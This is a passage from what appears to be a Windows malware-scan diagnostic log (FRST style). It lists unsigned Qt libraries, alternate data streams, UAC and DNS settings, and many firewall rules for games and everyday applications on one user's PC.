2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2021-09-14 00:46 - 005979312 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{3E12643C-7EBF-4744-B040-EEE763C56F6D}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [TCP Query User{8C8C4890-CEFB-4483-BC1B-8DA87FE83F73}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [{BD298CC7-821E-4819-9A26-698385BA3B7A}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe => No File
FirewallRules: [UDP Query User{4A0EBC18-06EA-4C87-87A1-4C990E41C7D3}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [TCP Query User{D4275EA6-2DDD-4686-AA4D-9A3310805EEC}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [UDP Query User{0DA0174C-7AB4-49C7-BA8B-8D68E76E894D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [TCP Query User{E177F9D2-5A17-47BA-89BF-EE69CFBE5A1D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [UDP Query User{1B7CBF21-ED14-4267-9095-29AE1089A8A9}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FF5BFDBA-25C4-4DE2-A652-F568B110169F}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [{12F7E6E4-EF2A-4F53-B472-BA7450D5430E}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{24770BD1-E3E6-4572-A0D8-4D8A978D0057}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{27FA26BB-7CA1-4B1B-AE4F-B1FD29FF1AF9}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{825C03FC-D3B6-45B1-ADDC-7EFCEA4A440F}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{D40D2F7F-832F-4C48-B2B4-6CBBDB1883EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [{4DE15F9F-866B-4678-9B97-FB5256AE51F9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [UDP Query User{4675CE24-74D3-4FD0-8949-9C33787B0DEB}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [TCP Query User{AD7E69AC-9D0E-4E38-B5D3-5771108ED725}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [{51E6F908-35D3-4FE6-8E6D-2BE375F7A4A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [{A117C129-8E57-4A5F-BFC1-ADE3AC7A8EC5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [UDP Query User{A419095C-3A92-4308-BB4D-137DADFB2060}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [TCP Query User{EC003A0A-0F5B-4BC4-8027-127CDD34D741}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [{3E5B1C19-9C21-45C9-9314-7F0ED6E173C9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{DAC12A37-5149-425C-86B1-940BE44AF9C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{B9F2E208-7EBC-4F05-A81E-CF26FE6EEF73}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [{6A2F2F22-97A7-4FA2-BA98-545F68C9F3DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [UDP Query User{4DE89CAA-64B3-4356-9F39-88239528713C}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [TCP Query User{6B8E16AD-44E7-4973-8143-46712B14266E}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [{8876B45B-FEDC-4E54-9ADF-7F59DA13B3DC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{7A09F2B5-A1B3-4584-8E04-F95AB8846A6F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [UDP Query User{F2106FD5-AF63-4F80-B266-400CD20A79BA}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [TCP Query User{C406884C-8D72-4D1E-AD55-57B21037C24B}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [UDP Query User{CA1B8127-55F9-47D2-AE87-01BF3285F80A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [TCP Query User{6F812FB8-9408-430F-9BEA-8F87DF1E666A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [{F45FC709-9DB9-4BF4-AF32-48037B4B1E88}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{A7BE5101-300C-4F37-B0C6-5D6F9343BFBA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{819F6E51-8D7C-46F9-8C49-728C026C4D49}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{5FA7B7A1-F6BA-495F-BBE1-0A3F7E9BA093}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8CC426E1-EEDA-4929-8CA9-24A340632044}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{70728EF1-D77C-44BE-BDA7-AEC73EE3F99E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A2E80910-BE5B-4FAB-AB98-C2AA35F89046}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{3035735B-83F5-4F06-BE7F-4BCC14DCEB99}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{E1A9225E-ED13-43F8-A5C3-F4F45FCC0D79}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{13629218-8017-449A-87B7-9DA4166140FA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{65B4A04D-E3BC-447A-AC84-89535112CDC7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{80EA8F03-E09D-471C-9C23-34DB1AFD0F7E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{DCFED574-FBAA-4975-AB72-7F191FC99BC0}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{558C3052-13F1-48E1-92ED-E261F000125C}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{7709B928-D87B-4C08-9650-BD0D55B3CEAA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{687D0ADB-4A66-4892-9CB6-7F917CFD3BBC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{8BCE8CA2-FF28-4C33-8BA0-C864AF161A49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [{684DABB3-C018-4657-97BB-404804BD9CB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [TCP Query User{A61F39F5-AF5A-485E-9DA5-BCCA8CBC059D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [UDP Query User{9DAD7DA6-8D85-43CC-A387-53B6B580375D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [TCP Query User{BB752D12-153E-4A49-9DA1-E9B8C0985C29}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [UDP Query User{C03FC8C5-DC18-4717-84EA-0F1A1B386F5F}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [{4456857A-4FDC-4A8E-A64A-90D79024DC3C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{EF3DBDB9-75BD-4185-A412-5AAC58B32B81}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{356E3ED2-C9F8-4C1F-8D1E-A3E3ED5872AC}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{67503904-3C3F-4311-AA42-3CE968E9459B}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [{6600988A-3E8D-4BB2-9073-62009DDE9CFF}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [TCP Query User{FBE7BF86-138D-479E-B64D-825C1350D34D}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [UDP Query User{EAEFB3E2-272C-4380-9AD8-A679DBA3FD9C}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [TCP Query User{CBA04267-ADE7-4A8F-98D5-1179FAB47424}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{5599CAFE-FB21-4163-82A9-FFF8208FFCDF}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{05814D12-6CA4-44EA-A1BB-B91ECB227500}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [UDP Query User{4DD2E8BC-DC9C-4519-8192-50B8A7C0624E}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [TCP Query User{45FCE454-50C4-44E0-A124-D38ED1D288FF}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{3B622155-C937-463E-BFD7-D4A45BACF17F}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{149A11AC-6845-4F23-9AC0-25E31A853823}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9E6ECAC2-5571-4810-91B9-B9FF72330AD0}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{1000DD04-D380-41DE-AFF9-1D848B29B0CB}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{7049F166-6EA5-48BA-89B7-C961956E64D1}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{C0AB333E-B963-49AF-9D11-C36C98114DD9}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{5CC520B6-DAC6-4115-BB18-F039E1666639}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{F60FB8AB-15F5-4D67-91BD-A47314F526C4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{BB6919EA-8FF7-47DB-BD1A-68ABBA53C6B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{55BCF914-6939-43C0-9D57-681AF1273AFC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{2E4C8ECF-4E93-45DF-B319-37EE82288616}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [TCP Query User{2904BFCE-FCC6-4FF5-B534-4ACFF3F0CFC8}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [UDP Query User{62F001EC-E422-4990-BFD3-E1AB751FAE99}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [{250CF44C-1F5D-4132-9FAB-DA648C1ABD26}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{0A964258-98FC-486F-B2EA-34A83CB40E3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{47BD7F4A-BE92-48F0-B699-7F92C199E69A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [{65CFA16F-BDC1-401E-A3F3-46394EF84F37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [TCP Query User{05E53D1F-8F73-4D83-88D4-E3EF1D21AAD0}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [UDP Query User{D2802595-8323-4996-A3DB-B2053205A57E}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [TCP Query User{91F12ED7-2766-4E6B-827B-B816725E6E09}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [UDP Query User{DCFB4155-590D-4220-B40D-25CB5C9BB385}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [TCP Query User{3DB8DFA7-2522-4AF8-ACC6-8D45B36F7373}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [UDP Query User{39AFD781-AC7A-488C-8592-BE0915131F04}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [TCP Query User{B333236D-5DE9-4EAE-BC1F-B00AAD0BB549}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [UDP Query User{20E062AD-9148-410B-BDFD-326EED231C4F}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [TCP Query User{EF14DFC7-AF28-49AF-8997-0F02030DB00D}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [UDP Query User{21152F44-B05B-4BBF-A8EC-EDAF24C1BA14}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [TCP Query User{CC80FBC5-71E4-426F-94D6-E20D2F782855}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [UDP Query User{3A99AB51-E8C5-41DD-B517-C38486ED9C07}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [TCP Query User{BD2E3FBB-6427-438C-A1D4-B16A68A3EF86}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [UDP Query User{0B75CCC6-30BE-48C1-87ED-1FB923820B07}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [TCP Query User{63DF027F-7F80-445C-BE62-9E4CCD612957}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{75585054-1A8D-4D89-B625-99B5D06A2676}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FA3863B9-CA16-4FF0-9083-834839CC0557}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D6ABD18D-3DAA-4EA5-A177-840605D6010C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
